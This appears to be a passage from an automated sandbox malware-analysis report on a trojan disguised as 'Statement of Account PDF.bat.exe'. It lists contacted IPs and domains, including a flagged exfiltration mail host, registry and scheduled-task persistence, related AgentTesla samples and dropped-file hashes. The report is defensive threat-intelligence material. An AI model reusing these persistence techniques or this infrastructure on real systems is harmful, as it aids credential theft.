                                                http://www.fontbureau.com/designers8Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fonts.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sandoll.co.krStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.urwpp.deDPleaseStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cnStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • 1%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStatement of Account PDF.bat.exe, 00000000.00000002.1699276440.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000A.00000002.1763034515.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1853285183.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1853285183.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1940766232.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1940766232.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sakkal.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.26.12.205
                                                      		api.ipify.orgUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      50.87.195.61
                                                      		mail.fascia-arch.comUnited States
                                                      		46606UNIFIEDLAYER-AS-1UStrue

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1432040
                                                      Start date and time:2024-04-26 10:32:05 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 12m 48s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:34
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Statement of Account PDF.bat.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@36/32@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 462
                                                      • Number of non-executed functions: 30
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      09:32:57Task SchedulerRun new task: gDdsxauPhk path: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      09:32:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      09:33:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      10:32:52API Interceptor5944805x Sleep call for process: Statement of Account PDF.bat.exe modified
                                                      10:32:56API Interceptor31x Sleep call for process: powershell.exe modified
                                                      10:33:00API Interceptor1374237x Sleep call for process: gDdsxauPhk.exe modified
                                                      10:33:09API Interceptor4809222x Sleep call for process: BjTxJte.exe modified
                                                      10:33:14API Interceptor3x Sleep call for process: WerFault.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.26.12.205Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                      • api.ipify.org/
                                                      lods.cmdGet hashmaliciousRemcosBrowse
                                                      • api.ipify.org/
                                                      50.87.195.61vbc.exeGet hashmaliciousFormBookBrowse
                                                      • www.vegrebel.com/nnmd/?VRNp=wBZl4vkh1&MvdD=iedGY0/hYfrjbbwxufAPjCijJp09b4Pnd9RoleXu3W9ZUfsJsAn0SGbENHPecaFD81L2
                                                      SWIFT COPY_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • www.smguidetowkw.com/m2be/?Et5pFP9=GRobwBHqsz/I/K6QMyhqlyyiibK6nxcxU5TpJro9yIpA+ftqAp39OLT0oN0WcJ2Wu53Xy7WDvg==&uDKLJ=D48t

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      mail.fascia-arch.comSOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 50.87.195.61
                                                      DHL STATEMENT OF ACCOUNT - 1003657363.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 50.87.195.61
                                                      PO.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 50.87.195.61
                                                      IOJMZilMeH.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 50.87.195.61
                                                      PO#7A68D20.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 50.87.195.61
                                                      api.ipify.orgCHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      https://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.26.13.205
                                                      http://asana.wfGet hashmaliciousUnknownBrowse
                                                      • 172.67.74.152
                                                      o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 172.67.74.152
                                                      http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                      • 104.26.12.205
                                                      16770075581.zipGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUShttps://powerpointmicrosoftoffice.top/Get hashmaliciousUnknownBrowse
                                                      • 104.17.3.184
                                                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:d35aec95-f365-414c-8371-68e6d7d2ec41Get hashmaliciousUnknownBrowse
                                                      • 104.17.28.92
                                                      150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                      • 23.227.38.74
                                                      CHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQmGet hashmaliciousHTMLPhisherBrowse
                                                      • 172.67.144.70
                                                      SOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      http://householdshop.club/Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      http://xred.site50.net/syn/SSLLibrary.dllGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      http://tracking.theimpco.com/tracking/click?d=OrpweRVshItmHO3qVpYwg0JJ3qp4iuwmt5687ge2H9uFpmeuDd2X4dPYczAnrgigX6DFu-Km6YtBvUpjEWnC0qAPektAg_1gGuxaDYDl5nf8rOcHvuOtOBIWknNeVHzB3g2Get hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      UNIFIEDLAYER-AS-1USQuotation Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 192.254.225.166
                                                      DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 50.87.253.239
                                                      CHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 192.254.225.136
                                                      SOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 50.87.195.61
                                                      INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 162.240.81.18
                                                      DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 192.232.216.145
                                                      DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 192.232.216.145
                                                      DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 192.232.216.145
                                                      https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                      • 192.185.214.24
                                                      https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                      • 162.241.120.242

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eCHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SOA FOR APR 2024 PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                      • 104.26.12.205
                                                      PO-inv-CQV20(92315).exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      a.cmdGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      http://papajoeschicago.comGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.26.12.205

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BjTxJte.exe_f5c09dd75b90d612af8c658c8837992c387ee89_843aacda_4690c535-c6af-41e6-8128-f3000ded106c\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2837376433510128
                                                      Encrypted:false
                                                      SSDEEP:192:A+lB/n9+0Wbk9aGOJo1ZrFmCozuiFxZ24IO87:RpnfWbk9ah1DzuiFxY4IO87
                                                      MD5:22425F011EE5D1D2BDBD23A46D7FFC03
                                                      SHA1:1B709DBFF1EFC0887DA605E47356819E8CA367E6
                                                      SHA-256:A3EAF2A0F48042F92E3FBBF2DC0327F93CB453FC909DD15AC48F4C3374021DEE
                                                      SHA-512:82CEA5F34241A5164978F36C70C96204B4C5A904F7D938E35CC92A5AB81838FB66B86A812D2900E5DB9B3EC813FAE7EE02C9ADA5570C61EC588BB4915DC71C5F
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.3.9.9.2.5.3.9.5.1.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.3.9.9.3.5.5.5.1.3.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.9.0.c.5.3.5.-.c.6.a.f.-.4.1.e.6.-.8.1.2.8.-.f.3.0.0.0.d.e.d.1.0.6.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.2.f.4.e.0.0.-.c.f.b.b.-.4.a.b.e.-.a.3.9.9.-.9.7.2.b.f.d.6.2.f.2.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.j.T.x.J.t.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.b.K...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.0.-.0.0.0.1.-.0.0.1.4.-.5.0.4.1.-.f.5.5.d.b.4.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.1.e.f.b.7.d.8.8.b.b.f.d.1.3.c.c.9.b.4.2.c.3.0.0.e.f.a.6.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.3.e.0.6.2.1.2.f.9.d.a.3.6.5.c.2.1.0.6.d.c.d.8.0.8.c.a.f.2.9.1.c.c.b.3.a.2.a.!.B.j.T.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BjTxJte.exe_f5c09dd75b90d612af8c658c8837992c387ee89_843aacda_f7977af1-9a55-4b84-b1d5-dbe8f1aea04e\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2772764358652007
                                                      Encrypted:false
                                                      SSDEEP:192:kmGV/T9+0Wbk9ayU+myZr07ptzuiFgZ24IO87:pGFTfWbk9a7FjzuiFgY4IO87
                                                      MD5:F44AC2F4A44A07012BAA8F3EC782F63C
                                                      SHA1:C34CF51938DC53EDF48124A09AE0B60C502AD1D6
                                                      SHA-256:5D7744177B4B5CF1CC0B0F5CDB4CEC5D788ABE70BEE58213318BF435A9E49614
                                                      SHA-512:262F198AB0674C530553F65256871E26186C570C0C33AC126B532328B0CC0A0909495CF8867133471C0D8D0D96416DCBB6900288C16AD3CB6F48039F428B24F0
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.4.0.0.0.9.0.3.2.3.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.4.0.0.1.4.1.8.8.6.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.9.7.7.a.f.1.-.9.a.5.5.-.4.b.8.4.-.b.1.d.5.-.d.b.e.8.f.1.a.e.a.0.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.c.4.a.3.9.d.-.7.e.c.3.-.4.7.6.4.-.8.e.a.3.-.b.2.8.b.d.f.d.6.a.3.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.j.T.x.J.t.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.b.K...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.8.-.0.0.0.1.-.0.0.1.4.-.7.0.c.e.-.f.3.6.2.b.4.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.1.e.f.b.7.d.8.8.b.b.f.d.1.3.c.c.9.b.4.2.c.3.0.0.e.f.a.6.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.3.e.0.6.2.1.2.f.9.d.a.3.6.5.c.2.1.0.6.d.c.d.8.0.8.c.a.f.2.9.1.c.c.b.3.a.2.a.!.B.j.T.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_gDdsxauPhk.exe_e2c8de6e9dfbc3bf198524a8a8bae3ea56c2edb2_cb724c00_6c828731-bc0c-4d10-93b3-5ed4934f0644\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.2882566430890479
                                                      Encrypted:false
                                                      SSDEEP:192:OrpvXMp+0WbkNauOJo1ZrFmCjkzuiFgZ24IO8kn:IvMrWbkNap1gkzuiFgY4IO8k
                                                      MD5:3AD43F30EC2A54F891CB1CF16EF05701
                                                      SHA1:CA106098A54EC28F039FAAF351716D8F14E1686D
                                                      SHA-256:0B56D7AD9FD97ACD42B690E84594FBD4DF5E1E4BBCE645275AB1704D22EF6D05
                                                      SHA-512:05044E1BB36F2C3A7BD87FB6F49395F8778A44F15985A5076467F87B8A6CF246964C575CE5A1FF565BD3A7D72A52DB26483A158D28A3BAD59A48DE8F2DDD845B
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.3.9.8.3.5.7.9.7.3.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.3.9.8.4.5.6.4.1.1.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.8.2.8.7.3.1.-.b.c.0.c.-.4.d.1.0.-.9.3.b.3.-.5.e.d.4.9.3.4.f.0.6.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.3.8.7.e.4.4.-.b.d.1.5.-.4.e.f.3.-.8.6.0.9.-.d.1.0.4.f.e.5.c.5.7.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.D.d.s.x.a.u.P.h.k...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.b.K...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.0.-.0.0.0.1.-.0.0.1.4.-.6.6.e.5.-.f.d.5.6.b.4.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.1.e.f.b.7.d.8.8.b.b.f.d.1.3.c.c.9.b.4.2.c.3.0.0.e.f.a.6.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.3.e.0.6.2.1.2.f.9.d.a.3.6.5.c.2.1.0.6.d.c.d.8.0.8.c.a.f.2.9.1.c.c.b.3.a.2.a.!.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER123.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4736
                                                      Entropy (8bit):4.459056297565655
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zs1Jg77aI9t6WpW8VYkYm8M4JdS2yFD++q8vqS29/NNPLSDd:uIjfPI7L77VsJxKs//zSDd
                                                      MD5:FAAFD1345CE621FE7FE244DDC4652D11
                                                      SHA1:18170FC6E098EDA119CCA1407AC3DA462C951B47
                                                      SHA-256:945A3AE7BF519B317A686FE782124D145881A7EB4C3708AE161348E0BA5D45A4
                                                      SHA-512:E1BB8616D25A65981AFDAFEC1692975E454E119A88534D35AD23527DAFD7A5591ACB98DFB64729C6B1F56EDC492F2882A7CE03104C9BF77640BE1E2BE2E1BDE0
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296615" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER211D.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:33:13 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):242199
                                                      Entropy (8bit):4.534388695167162
                                                      Encrypted:false
                                                      SSDEEP:3072:ClR+U4uEqMQPbEDLTguhWy8E4OBqqWxYTqP:ClIU4lQPbsTgucy8LXYo
                                                      MD5:080662EE6631655199D65F68221C6D94
                                                      SHA1:0B4BBA1A5F9B1F96DA49646B5EC1762068D1E461
                                                      SHA-256:9EA784CEEC5BE4531E3D0CF3941C13509FC2004E90E2DDB7DB3B3153E1ABBED6
                                                      SHA-512:5DB37387AF8F29AAC7C97D93B5EB2C9DC6668B21D35F451923DB7FEF17D6FBFE8A2AB29A31C443F5E864641A09864168F034661A4A489289702E583E1AE8E3A7
                                                      Malicious:false
                                                      Preview:MDMP..a..... ........f+f............d...........t#..x.......$....*......4&...@..........`.......8...........T...........8F...k...........+...........,..............................................................................eJ.......-......GenuineIntel............T.......`....f+f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2312.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8400
                                                      Entropy (8bit):3.684054244990612
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJns69rUG6Y91SU9S3ongmfZivprc89bM5sfTEm:R6lXJs69rV6YvSU9S3AgmfY7MSfV
                                                      MD5:CE15E1E6FB4A96EA97EEB3B524CD757F
                                                      SHA1:572D2F9B9AFFA4626ACD540FC407078648F99605
                                                      SHA-256:6CB860F036EF7FB60332AA5F4701A9D75C94104C8F6D5E8B0E3568F25D2C2F35
                                                      SHA-512:EFF4845D78F316FF557FC5617DBC010AB788A56C574B7E35E9CDDA5C695E1069200415494841394FCABC269B66E55BE463091DCBFE56A2B347FE2F6C5BFCF878
                                                      Malicious:false
